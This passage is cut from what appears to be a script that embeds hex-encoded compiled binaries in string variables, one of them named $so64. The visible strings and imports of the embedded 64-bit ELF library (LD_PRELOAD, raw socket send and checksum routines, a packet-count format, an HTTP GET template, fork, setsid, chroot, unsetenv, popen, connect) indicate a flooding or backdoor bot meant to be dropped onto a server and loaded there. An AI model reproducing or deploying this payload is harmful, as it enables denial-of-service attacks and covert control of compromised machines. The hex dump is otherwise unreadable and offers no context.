4x3fx60xd0xe8xbfxdex37xcax45x78xb1x73x34xf2x81x63x37x26xb8xc3x9bxe5x49x65xefx8dx50xcax19x82x2ex58xe3xffx40xa2xddx77x6cx22xf0x1dx95x24x0fx16x87x47x3cx3fx0axd7x25x53x3cx14xe1x8cxdexfax0fx0dx53xf2x0cx93x94xe9x0bx01x0cxfbx1exa1x1fx2exb8xa7x75xf4xe6x7fxccx0bxd2x08x1fxb3x95xfexaexa4x0bx01x96x17x94x2ax00x9fx2bx0cx9ax4axaexbax78x66x61xedx5ax47x6cx26x53x3ex2fx72xf2xc4x70xa0x68x7bxa1xfex92x35x28x93xd5x54x9fx6fx9ex4dx29x16xb3x8ax03x0exd2x6fx34x25xadx63x97x9fx27x08x3fx8fx83xe0x8dx16x16xb6xa9xebx0ax48x5axa8x96x84xbex49x0exc1x57xe0x30x8cx05xddxefx9dx7dx17xa5xbcxa6x28x9dx34x3exb3xeaxe7x9exf4x30xf8x9cxc6x7cx5ax0fx8bx1bx67x6bx4bxf3x71x28xe2x0exa5xf9xb3x62xa0xdbxffxd4x1axb2xbex01x50xb2x31x48x4exf7xc5xa8x07x50xc3x6exbbx0ex61x2cx36x43x3axdcx3dxedx3exddxc9x3dxb1xe3xefx6fxe4x3fx21x16x87x6fx0dx4cx17x14x9cxdax82x58xe8xe3x84x1ex27xbfxfax64xacx38x41x75x75xf2x58x64x61x3dxa3x82x53x2bxf1x60x77x08x75x14xe2xf7x6cxcaxdbxf0xe8x02xafxe3x66x5cx1bxa7xd1x91x99x2axf5xfax67x99x7cxbaxc4x6dx1ax3bx75x8fx4fx57x87xbbx21x62xacx09x64x5bxecxcaxb7x08x71x89x99x0axb3x8ex04x1ax27x80xd4xebxedxeex27x62x7ex76xb9x05x32xdax67xdexe3xcbx39xd0x95xf1xd8x06x7ax71x10x2dxffx14x47x27x94x1bx12x81x09x39xe3x87xb0x9cx8cxe2x76xf3xc0x59xbexf9x29x53xeax01x59x64x72x69x91x72x7dxd8x99x11xf3xabx92xfdxe5x75x84x95x11x11x77x87x04x37xe1xc3x30x0ax16x1bx0cx70x7fx7exd9x11xf0x57xe9x89x68xddx35xfbxdax1ax70x5exafx82x6fx26x09x74x5dxeax37x8dxf5x4dxa8x01xbdx28x7fx97x39x70xeex22xf9x56xffx2ex51xd9x48xc2x38xf7x44xa7x1dx4dx1bx7ax38x52x08x2dxa0xb0x2ex5dxd8xadxf4x11x1dxe2x34x17x39x33x45x8ax0dx8ex4cx45x85x90xecxa3xdex08x1dx16x5ax25x43xfaxd6x71x58xaex1ex4cxc0x3cx2fxf4x53x68x27x98xf2x34x26x3fx79xacxcfx66x4fxadx6ex6cxc3xc8x92x06xc3x68x77x1bx16x96x67xd6xd2x96xcax25xfexf2xbdxf1x26xe4x30xa0x90xffx06xdfxadx74x4bx70x3cxddx77xffx45xeex1ax5cx84x82x32x56x18xfdx7bx17xefx39x08x15x1dx38xb5xadx37xbbx8cxe4x2fxd7x55x6cxb5xccx6bxfaxbax86x56x3fx08x89x95x20x86x11x37x75x4ax3fx8ax67x77x40x14xafxfbxa0x93x2bx77xe8x97x2cxb4x02x27x6fx88x7dxaex90x06x43xb1x8cx54xe8x01x9ex28x8cx05x9fxccx19x4exc7xb9xe2xf2x31xcax89x5dx7fx8cx84xeex14x02x9cxa5x08xdfx56x95x34x3ex96xd2x66x22xd8x06xeexf1x54xb6xabx36xa8xdcx01x32x39x80xbexbex6exd2xc0x0ax77xc8xe9xcdx5dx1dx0cxf4xf0x72x16xc8x78x05xb9xcdxbbx64x03x63x40x04x95x7ax84x53x38xf2x26xf8xfcx9dxc0xe6x6bx1ex03x77x12xf3xe9x28xbbx62x2dx75x2fxe8xd9x32x4cx1ax37xe1x94xbbx35xccxaex5bxc4xaaxf8x84x90x63xa2x94xdaxb4x87xc4xddx43x26x0axb8x55xf3x91x87x3fxabxbex20x3fx7ax55x0bx28xb0xcfxd2xa9x54x63x0cxf6xf7xe7xabx7exabx88xc1xd1x92x79x26x85x0bxadxc4xb6x6cxe5xf6xe6x3ax01x0exebxd1xe0x94x25x43xa0x1bx3ax87xc6xb9x32x4ex7ax03xe1xf4x29x66xffxd7x2bxb5x43x10xabx29x4axadx37x35x7ex17xc9xa3x5bx6axbex95xf1x85x4ex24xd3xc9x27xb4xbdx51x1bxbcx28x46x71x6bx56x1dx94xa0xcaxcbxd6x48xe2x9fxebx3dx09xa9xd3xfbx2ex21x1fx02xeax46xb6xa7x97xd1x63xbfx17xd5x2ax6dxf2xbex0exbcx89xe4x04x6cx83xefxa9x8dx98x7cx88xc7x9exa7xc9x88xedx7fx30x85x51x93x44x68x68x6fxd6x5ax2dxe4x16xb7xc8x1ax23x4bx09xccxd8xa2x49x60x69xe7x07x32x6fxf5xb1x9fx7ax02x33xbex6bx9bx2dx41xf6x5bx25x0cx12xedx27x35x38x30x01x11xd2x4ax71x3bx31x79x6dxa1x6ex1fx40xe8x21x73xa6x8cx0fxd4xcdx05x2fxf2x11x41xdfx38x76x18x69x77x29x3bxc2x9ax77xf3x13xe4x94x81x03xd5x69x25x48x10xb1x57xe4x7fx5cx13x71x6ex54x51xa6xcax69x0fx41x92x4bx03x2cxc2xf7x40xa6x8bxc1xaax60x2bxcfxa9x3bx80x00x1fxffx5dx32x71xcbx86xc2x71x50x2bx81x91xbdxccx95xe9x8ex8cx29x34x17xebxdex78x16xadx21x51x2ex21x4cx44x5fx50x52x45x4cx4fx41x44x00x2fx75x73x72x2fx62x69x6ex2fx75x6ex61x6dx65x20x2dx61x00x72x00x70x61x63x6bx65x74x73x20x25x64x20x72x61x6ex67x65x20x25x64x20x3dx20x25x64x0ax00x47x45x54x20x25x73x3fx72x3dx25x73x0dx0ax48x6fx73x74x3ax20x25x73x0dx0ax0dx0ax00x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax30x31x32x33x34x35x36x37x38x39x2bx2fx00x7cx24x24x24x7dx72x73x74x75x76x77x78x79x7ax7bx24x24x24x24x24x24x24x3ex3fx40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x24x24x24x24x24x24x58x59x5ax5bx5cx5dx5ex5fx60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x00x2fx64x65x76x2fx6ex75x6cx6cx00x41x55x00x28x6ex75x6cx6cx29x00";
$so64 = "x7fx45x4cx46x02x01x01x00x00x00x00x00x00x00x00x00x03x00x3ex00x01x00x00x00x68x10x40x00x00x00x00x00x40x00x00x00x00x00x00x00xc8x38x00x00x00x00x00x00x00x00x00x00x40x00x38x00x03x00x40x00x0ex00x0bx00x01x00x00x00x05x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x40x00x00x00x00x00xbfx24x00x00x00x00x00x00xbfx24x00x00x00x00x00x00x00x00x20x00x00x00x00x00x01x00x00x00x06x00x00x00xc0x24x00x00x00x00x00x00xc0x24x60x00x00x00x00x00xc0x24x60x00x00x00x00x00xa9x13x00x00x00x00x00x00x78x34x00x00x00x00x00x00x00x00x20x00x00x00x00x00x02x00x00x00x06x00x00x00xc0x24x00x00x00x00x00x00xc0x24x60x00x00x00x00x00xc0x24x60x00x00x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x08x00x00x00x00x00x00x00x25x00x00x00x34x00x00x00x00x00x00x00x2ax00x00x00x13x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x29x00x00x00x0bx00x00x00x00x00x00x00x25x00x00x00x12x00x00x00x00x00x00x00x04x00x00x00x28x00x00x00x33x00x00x00x21x00x00x00x31x00x00x00x00x00x00x00x1cx00x00x00x26x00x00x00x00x00x00x00x30x00x00x00x2cx00x00x00x17x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1dx00x00x00x00x00x00x00x2bx00x00x00x18x00x00x00x32x00x00x00x22x00x00x00x00x00x00x00x2ex00x00x00x24x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x09x00x00x00x00x00x00x00x00x00x00x00x0ex00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x16x00x00x00x05x00x00x00x15x00x00x00x03x00x00x00x00x00x00x00x0fx00x00x00x0dx00x00x00x00x00x00x00x07x00x00x00x1fx00x00x00x20x00x00x00x1ex00x00x00x00x00x00x00x1bx00x00x00x00x00x00x00x0cx00x00x00x08x00x00x00x00x00x00x00x0ax00x00x00x23x00x00x00x14x00x00x00x00x00x00x00x1ax00x00x00x27x00x00x00x19x00x00x00x2dx00x00x00x2fx00x00x00x02x00x00x00x11x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x03x00x06x00x68x10x40x00x00x00x00x00x00x00x00x00x00x00x00x00x39x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x21x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x18x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x28x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xd8x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x6ex01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x62x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xadx00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x0cx01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xcfx00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x5fx01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xa6x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x2ex00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x79x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x05x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xa7x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xebx00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x74x00x00x00x12x00x06x00xc1x13x40x00x00x00x00x00x38x00x00x00x00x00x00x00x42x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xc1x00x00x00x12x00x06x00xccx18x40x00x00x00x00x00x76x00x00x00x00x00x00x00x08x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x2cx01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xbcx00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x4cx01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xb5x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x67x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x27x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1bx01x00x00x12x00x06x00x79x21x40x00x00x00x00x00x46x03x00x00x00x00x00x00x34x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x3bx00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xcax00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x66x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x59x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x91x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xd7x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x6dx01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xdfx00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x7ex00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x48x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x13x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x47x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x29x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x32x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xf8x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x3cx00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x6fx00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x53x01x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x73x6fx63x6bx65x74x00x73x65x74x73x6fx63x6bx6fx70x74x00x65x78x69x74x00x75x6ex73x65x74x65x6ex76x00x73x74x72x63x70x79x00x70x6fx70x65x6ex00x66x67x65x74x73x00x73x74x72x64x75x70x00x66x63x6cx6fx73x65x00x77x72x69x74x65x00x5fx5fx65x72x72x6ex6fx5fx6cx6fx63x61x74x69x6fx6ex00x73x68x75x74x64x6fx77x6ex00x72x65x63x76x00x72x65x61x6cx6cx6fx63x00x66x72x65x65x00x63x73x75x6dx00x70x75x74x73x00x70x74x68x72x65x61x64x5fx6dx75x74x65x78x5fx6cx6fx63x6bx00x70x74x68x72x65x61x64x5fx6dx75x74x65x78x5fx75x6ex6cx6fx63x6bx00x75x73x6cx65x65x70x00x63x6fx6ex6ex65x63x74x00x73x65x6ex64x74x6fx00x72x65x61x64x00x65x6ex63x69x70x68x65x72x00x74x69x6dx65x00x67x65x74x65x75x69x64x00x73x70x72x69x6ex74x66x00x67x65x74x61x64x64x72x69x6ex66x6fx00x66x72x65x65x61x64x64x72x69x6ex66x6fx00x70x74x68x72x65x61x64x5fx6ax6fx69x6ex00x6dx61x6cx6cx6fx63x00x70x74x68x72x65x61x64x5fx63x72x65x61x74x65x00x69x6ex69x74x00x73x69x67x6ex61x6cx00x66x6fx72x6bx00x75x6dx61x73x6bx00x73x65x74x73x69x64x00x63x68x72x6fx6fx74x00x73x74x72x63x68x72x00x61x74x6fx69x00x75x6ex6cx69x6ex6bx00x67x65x74x73x6fx63x6bx6ex61x6dx65x00x67x65x74x65x6ex76x00x73x74x72x63x6dx70x00x73x72x61x6ex64x6fx6dx00x00x00x00xd8x25x60x00x00x00x00x00x07x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00xe0x25x60x00x00x00x00x00x07x00x00x00x03x00x00x00x00x00x00x00x00x00x00x00xe8x25x60x00x00x00x00x00x07x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00xf0x25x60x00x00x00x00x00x07x00x00x00x05x00x00x00x00x00x00x00x00x00x00x00xf8x25x60x00x00x00x00x00x07x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x26x60x00x00x00x00x00x07x00x00x00x07x00x00x00x00x00x00x00x00x00x00x00x08x26x60x00x00x00x00x00x07x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x10x26x60x00x00x00x00x00x07x00x00x00x09x00x00x00x00x00x00x00x00x00x00x00x18x26x60x00x00x00x00x00x07x00x00x00x0ax00x00x00x00x00x00x00x00x00x00x00x20x26x60x00x00x00x00x00x07x00x00x00x0bx00x00x00x00x00x00x00x00x00x00x00x28x26x60x00x00x00x00x00x07x00x00x00x0cx00x00x00x00x00x00x00x00x00x00x00x30x26x60x00x00x00x00x00x07x00x00x00x0dx00x00x00x00x00x00x00x00x00x00x00x38x26x60x00x00x00x00x00x07x00x00x00x0ex00x00x00x00x00x00x00x00x00x00x00x40x26x60x00x00x00x00x00x07x00x00x00x0fx00x00x00x00x00x00x00x00x00x00x00x48x26x60x00x00x00x00x00x07x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x50x26x60x00x00x00x00x00x07x00x00x00x11x00x00x00x00x00x00x00x00x00x00x00x58x26x60x00x00x00x00x00x07x00x00x00x12x00x00x00x00x00x00x00x00x00x00x00x60x26x60x00x00x00x00x00x07x00x00x00x13x00x00x00x00x00x00x00x00x00x00x00x68x26x60x00x00x00x00x00x07x00x00x00x14x00x00x00x00x00x00x00x00x00x00x00x70x26x60x00x00x00x00x00x07x00x00x00x15x00x00x00x00x00x00x00x00x00x00x00x78x26x60x00x00x00x00x00x07x00x00x00x16x00x00x00x00x00x00x00x00x00x00x00x80x26x60x00x00x00x00x00x07x00x00x00x17x00x00x00x00x00x00x00x00x00x00x00x88x26x60x00x00x00x00x00x07x00x00x00x18x00x00x00x00x00x00x00x00x00x00x00x90x26x60x00x00x00x00x00x07x00x00x00x19x00x00x00x00x00x00x00x00x00x00x00x98x26x60x00x00x00x00x00x07x00x00x00x1ax00x00x00x00x00x00x00x00x00x00x00xa0x26x60x00x00x00x00x00x07x00x00x00x1bx00x00x00x00x00x00x00x00x00x00x00xa8x26x60x00x00x00x00x00x07x00x00x00x1cx00x00x00x00x00x00x00x00x00x00x00xb0x26x60x00x00x00x00x00x07x00x00x00x1dx00x00x00x00x00x00x00x00x00x00x00xb8x26x60x00x00x00x00x00x07x00x00x00x1ex00x00x00x00x00x00x00x00x00x00x00xc0x26x60x00x00x00x00x00x07x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00xc8x26x60x00x00x00x00x00x07x00x00x00x21x00x00x00x00x00x00x00x00x00x00x00xd0x26x60x00x00x00x00x00x07x00x00x00x22x00x00x00x00x00x00x00x00x00x00x00xd8x26x60x00x00x00x00x00x07x00x00x00x23x00x00x00x00x00x00x00x00x00x00x00xe0x26x60x00x00x00x00x00x07x00x00x00x24x00x00x00x00x00x00x00x00x00x00x00xe8x26x60x00x00x00x00x00x07x00x00x00x25x00x00x00x00x00x00x00x00x00x00x00xf0x26x60x00x00x00x00x00x07x00x00x00x26x00x00x00x00x00x00x00x00x00x00x00xf8x26x60x00x00x00x00x00x07x00x00x00x27x00x00x00x00x00x00x00x00x00x00x00x00x27x60x00x00x00x00x00x07x00x00x00x28x00x00x00x00x00x00x00x00x00x00x00x08x27x60x00x00x00x00x00x07x00x00x00x29x00x00x00x00x00x00x00x00x00x00x00x10x27x60x00x00x00x00x00x07x00x00x00x2ax00x00x00x00x00x00x00x00x00x00x00x18x27x60x00x00x00x00x00x07x00x00x00x2bx00x00x00x00x00x00x00x00x00x00x00x20x27x60x00x00x00x00x00x07x00x00x00x2cx00x00x00x00x00x00x00x00x00x00x00x28x27x60x00x00x00x00x00x07x00x00x00x2dx00x00x00x00x00x00x00x00x00x00x00x30x27x60x00x00x00x00x00x07x00x00x00x2ex00x00x00x00x00x00x00x00x00x00x00x38x27x60x00x00x00x00x00x07x00x00x00x2fx00x00x00x00x00x00x00x00x00x00x00x40x27x60x00x00x00x00x00x07x00x00x00x30x00x00x00x00x00x00x00x00x00x00x00x48x27x60x00x00x00x00x00x07x00x00x00x31x00x00x00x00x00x00x00x00x00x00x00x50x27x60x00x00x00x00x00x07x00x00x00x32x00x00x00x00x00x00x00x00x00x00x00x58x27x60x00x00x00x00x00x07x00x00x00x33x00x00x00x00x00x00x00x00x00x00x00xffx35x7ax18x20x00xffx25x7cx18x20x00x0fx1fx40x00xffx25x7ax18x20x00x68x00x00x00x00xe9xe0xffxffxffxffx25x72x18x20x00x68x01x00x00x00xe9xd0xffxffxffxffx25x6ax18x20x00x68x02x00x00x00xe9xc0xffxffxffxffx25x62x18x20x00x68x03x00x00x00xe9xb0xffxffxffxffx25x5ax18x20x00x68x04x00x00x00xe9xa0xffxffxffxffx25x52x18x20x00x68x05x00x00x00xe9x90xffxffxffxffx25x4ax18x20x00x68x06x00x00x00xe9x80xffxffxffxffx25x42x18x20x00x68x07x00x00x00xe9x70xffxffxffxffx25x3ax18x20x00x68x08x00x00x00xe9x60xffxffxffxffx25x32x18x20x00x68x09x00x00x00xe9x50xffxffxffxffx25x2ax18x20x00x68x0ax00x00x00xe9x40xffxffxffxffx25x22x18x20x00x68x0bx00x00x00xe9x30xffxffxffxffx25x1ax18x20x00x68x0cx00x00x00xe9x20xffxffxffxffx25x12x18x20x00x68x0dx00x00x00xe9x10xffxffxffxffx25x0ax18x20x00x68x0ex00x00x00xe9x00xffxffxffxffx25x02x18x20x00x68x0fx00x00x00xe9xf0xfexffxffxffx25xfax17x20x00x68x10x00x00x00xe9xe0xfexffxffxffx25xf2x17x20x00x68x11x00x00x00xe9xd0xfexffxffxffx25xeax17x20x00x68x12x00x00x00xe9xc0xfexffxffxffx25xe2x17x20x00x68x13x00x00x00xe9xb0xfexffxffxffx25xdax17x20x00x68x14x00x00x00xe9xa0xfexffxffxffx25xd2x17x20x00x68x15x00x00x00xe9x90xfexffxffxffx25xcax17x20x00x68x16x00x00x00xe9x80xfexffxffxffx25xc2x17x20x00x68x17x00x00x00xe9x70xfexffxffxffx25xbax17x20x00x68x18x00x00x00xe9x60xfexffxffxffx25xb2x17x20x00x68x19x00x00x00xe9x50xfexffxffxffx25xaax17x20x00x68x1ax00x00x00xe9x40xfexffxffxffx25xa2x17x20x00x68x1bx00x00x00xe9x30xfexffxffxffx25x9ax17x20x00x68x1cx00x00x00xe9x20xfexffxffxffx25x92x17x20x00x68x1dx00x00x00xe9x10xfexffxffxffx25x8ax17x20x00x68x1ex00x00x00xe9x00xfexffxffxffx25x82x17x20x00x68x1fx00x00x00xe9xf0xfdxffxffxffx25x7ax17x20x00x68x20x00x00x00xe9xe0xfdxffxffxffx25x72x17x20x00x68x21x00x00x00xe9xd0xfdxffxffxffx25x6ax17x20x00x68x22x00x00x00xe9xc0xfdxffxffxffx25x62x17x20x00x68x23x00x00x00xe9xb0xfdxffxffxffx25x5ax17x20x00x68x24x00x00x00xe9xa0xfdxffxffxffx25x52x17x20x00x68x25x00x00x00xe9x90xfdxffxffxffx25x4ax17x20x00x68x26x00x00x00xe9x80xfdxffxffxffx25x42x17x20x00x68x27x00x00x00xe9x70xfdxffxffxffx25x3ax17x20x00x68x28x00x00x00xe9x60xfdxffxffxffx25x32x17x20x00x68x29x00x00x00xe9x50xfdxffxffxffx25x2ax17x20x00x68x2ax00x00x00xe9x40xfdxffxffxffx25x22x17x20x00x68x2bx00x00x00xe9x30xfdxffxffxffx25x1ax17x20x00x68x2cx00x00x00xe9x20xfdxffxffxffx25x12x17x20x00x68x2dx00x00x00xe9x10xfdxffxffxffx25x0ax17x20x00x68x2ex00x00x00xe9x00xfdxffxffxffx25x02x17x20x00x68x2fx00x00x00xe9xf0xfcxffxffxffx25xfax16x20x00x68x30x00x00x00xe9xe0xfcxffxffx41x54xbex03x00x00x00x55x48x89xfdx53x48x83xecx20x8bx07xc7x44x24x1cx01x00x00x00xa8x01x75x0bx89xc6xc1xe6x1dxc1xfex1fx83xc6x02x83xe0x04xbfx02x00x00x00x83xf8x01x19xd2x83xe2x0bx83xc2x06xe8xafxfdxffxffx85xc0x89xc3x0fx88xabx00x00x00xf6x45x00x01x74x2ex31xd2x83x3dxdax27x20x00x09x48x8dx4cx24x1cx41xb8x04x00x00x00x89xc7x0fx95xc2x31xf6x83xc2x02xe8xccxfdxffxffx85xc0x79x07x31xffxe8xf1xfexffxffx8bx45x20xb9xe8x03x00x00x31xd2x41xbcx15x00x00x00xbdx01x00x00x00x89xdfx41xb8x10x00x00x00xf7xf1x48x8dx4cx24x08x69xd2xe8x03x00x00x83x3dx84x27x20x00x09x89xc0x48x89x44x24x08xb8x05x10x00x00x48x89x54x24x10xbax14x00x00x00x44x0fx44xe0xb0x06x0fx44xd0x66xb8xffxffx0fx44xe8x89xeexe8x63xfdxffxffx48x8dx4cx24x08x41xb8x10x00x00x00x44x89xe2x89xeex89xdfxe8x4cxfdxffxffxebx03x83xcbxffx48x83xc4x20x89xd8x5bx5dx41x5cxc3x55x48x8dx05xf8xffxffxffx53x48x25x00xf0xffxffx48x81xecx88x00x00x00xebx06x48x2dx00x10x00x00x81x38x7fx45x4cx46x75xf2x0fxb6x40x07x48x8dx3dxd3x25x20x00x48x89xe3x89x05xf6x26x20x00xe8xcdxfbxffxffx83x3dxeax26x20x00x09x48x8dx35xc2x25x20x00x74x07x48x8dx35xbdx25x20x00x48x89xe7xe8x9exfbxffxffx48x8dx35xbcx25x20x00x48x89xe7xe8xafxfbxffxffx48x85xc0x48x89xc5x74x38x31xc0xb9x20x00x00x00x48x89xdfxf3xabx48x89xeaxbex7fx00x00x00x48x89xe7xe8x1bxfcxffxffx48x85xc0x74x0fx48x89xe7xe8x1exfdxffxffx48x89x05xd7x26x20x00x48x89xefxe8x1fxfdxffxffx48x81xc4x88x00x00x00x5bx5dxc3x41x57x31xc0x48x83xc9xffx41x56x41x55x41x89xfdx48x89xf7x41x54x55x31xedx53x48x89xf3x48x81xecx08x40x00x00xf2xaex48xf7xd1x44x8dx61xffx4dx63xf4xebx38x4cx89xf2x48x8dx34x2bx44x89xefx48x29xeaxe8x23xfcxffxffx48x83xf8xffx49x89xc7x74x07x48x85xc0x74x20xebx13xe8x4exfdxffxffx8bx00x83xf8x0bx74x0ax83xf8x04x74x05xebx0bx48x01xc5x49x39xeex77xc3x49x89xefx4dx63xe4x31xdbx4dx39xe7x0fx85x9fx00x00x00xbex01x00x00x00x44x89xefx31xedx49x89xe4xe8xb5xfcxffxffx31xc9xbax00x40x00x00x48x89xe6x44x89xefxe8xf3xfaxffxffx85xc0x41x89xc7x7ex3bx46x8dx74x3dx00x48x89xdfx41x8dx76x01x48x63xf6xe8x28xfcxffxffx48x85xc0x48x89xc3x74x58x48x63xedx49x63xcfx4cx89xe6x48x01xc5x41x81xfex00x00x10x00x48x89xefx44x89xf5xf3xa4x7fx1axebxacx41xffxc7x75x13xe8xb7xfcxffxffx8bx00x83xf8x0bx74x9bx83xf8x04x74x96xebx12x48x85xdbx74x0dx85xedx74x09x48x63xedxc6x04x2bx00xebx0fx48x85xdbx74x0ax48x89xdfx31xdbxe8x08xfdxffxffx48x81xc4x08x40x00x00x48x89xd8x5bx5dx41x5cx41x5dx41x5ex41x5fxc3x8bx0fx8bx57x04xb8xf3x3ax62xccx89xc6x4cx8dx0dxf8x13x20x00x41x89xc8xc1xeex0bx41x89xcax41xc1xe8x05x83xe6x03x41xc1xe2x04x41x8bx34xb1x45x31xd0x41x01xc8x01xc6x05x47x86xc8x61x44x31xc6x29xf2x48x89xc6x83xe6x03x41x89xd0x41x8bx34xb1x41x89xd1x41xc1xe8x05x41xc1xe1x04x45x31xc8x01xc6x41x01xd0x44x31xc6x29xf1x85xc0x75xa4x89x0fx89x57x04xc3x53x31xdbxebx0bx0fxb7x07xffxcex48x83xc7x02x01xc3x85xf6x7fxf1x48x8dx3dxe6x23x20x00xe8x47xfaxffxffx89xd8x81xe3xffxffx00x00xc1xe8x10x01xc3x89xd8xc1xe8x10x01xd8xf7xd0x5bxc3x41x57x48x89xfexb9x0ax00x00x00x41x56x41x55x41x54x55x31xedx53x48x81xecxe8x00x01x00x48x8dx84x24xa8x00x01x00x48x8dx9cx24xd0x00x01x00x48x89xc7x89xe8xf3xa5x48x89xdfxb1x04xf3xabx48x8dx3dx37x24x20x00xe8x7axfbxffxffx48x8dx3dx2bx24x20x00xffx05x4dx24x20x00xe8x28xfbxffxffx83x3dx45x24x20x00x09xb9x04x00x00x00x48x89xdfx89xe8xf3xabx66xc7x84x24xd0x00x01x00x02x00x75x0ax66xc7x84x24xd0x00x01x00x00x02x8bx84x24xb0x00x01x00x44x8bxa4x24xc4x00x01x00x66xc1xc8x08x66x89x84x24xd2x00x01x00x8bx84x24xacx00x01x00x89x84x24xd4x00x01x00x69x84x24xccx00x01x00xe8x03x00x00xf6x84x24xa8x00x01x00x01x89x84x24xccx00x01x00x74x2dx48x8dxbcx24xa8x00x01x00xe8x9dxfbxffxffx8bxbcx24xccx00x01x00x89xc3xe8x2fxf9xffxffx89xd8xc1xe8x1fx74x30x83x3dxb9x23x20x00x00x75xd5xebx25x8bx84x24xc0x00x01x00x48x8dx54x24x28x85xc0x74x26x48x63xc8x48x8bxb4x24xb8x00x01x00x48x89xd7xf3xa4x41x89xc4x31xdbx48x8dx44x24x30x31xedx48x89x44x24x18xe9x61x03x00x00x49x63xccx31xc0x48x89xd7xf3xaaxebxe1x66x8bx84x24xb2x00x01x00x66x39x84x24xb0x00x01x00x73x31xe8x64xf8xffxffx8bx8cx24xb0x00x01x00x0fxb7xb4x24xb2x00x01x00x0fxb7xd1x29xd6x48x99xffxc6x48x63xf6x48xf7xfex01xd1x66xc1xc9x08x66x89x8cx